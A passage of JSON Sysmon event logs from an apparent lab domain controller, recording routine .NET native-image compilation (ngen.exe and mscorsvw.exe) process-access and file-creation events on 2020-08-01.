08:03:59.320","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21EF-5F25-0000-00104D570A00}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6658,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:59.320\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21EF-5F25-0000-00104D570A00}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:59.320","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21EF-5F25-0000-00104D570A00}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6659,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:59.320\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21EF-5F25-0000-00104D570A00}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:59.320","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21EF-5F25-0000-00104D570A00}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6660,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:00.195\r\nProcessGuid: {41C8662E-21EF-5F25-0000-00104D570A00}\r\nProcessId: 4976\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1370-0\\System.Management.dll\r\nCreationUtcTime: 2020-08-01 08:04:00.195","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:00.195","ProcessGuid":"{41C8662E-21EF-5F25-0000-00104D570A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1370-0\\System.Management.dll","CreationUtcTime":"2020-08-01 08:04:00.195","EventReceivedTime":"2020-08-01 08:04:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6661,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:00.242\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F0-5F25-0000-0010295B0A00}\r\nTargetProcessId: 2516\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:00.242","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F0-5F25-0000-0010295B0A00}","TargetProcessId":"2516","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6662,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:00.242\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F0-5F25-0000-0010295B0A00}\r\nTargetProcessId: 2516\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:00.242","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F0-5F25-0000-0010295B0A00}","TargetProcessId":"2516","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6663,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:00.257\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F0-5F25-0000-0010295B0A00}\r\nTargetProcessId: 2516\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:00.257","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F0-5F25-0000-0010295B0A00}","TargetProcessId":"2516","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6664,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:00.273\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F0-5F25-0000-00100A5E0A00}\r\nTargetProcessId: 1248\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:00.273","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F0-5F25-0000-00100A5E0A00}","TargetProcessId":"1248","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6665,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:00.273\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F0-5F25-0000-00100A5E0A00}\r\nTargetProcessId: 1248\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:00.273","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F0-5F25-0000-00100A5E0A00}","TargetProcessId":"1248","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6666,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:00.273\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F0-5F25-0000-00100A5E0A00}\r\nTargetProcessId: 1248\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 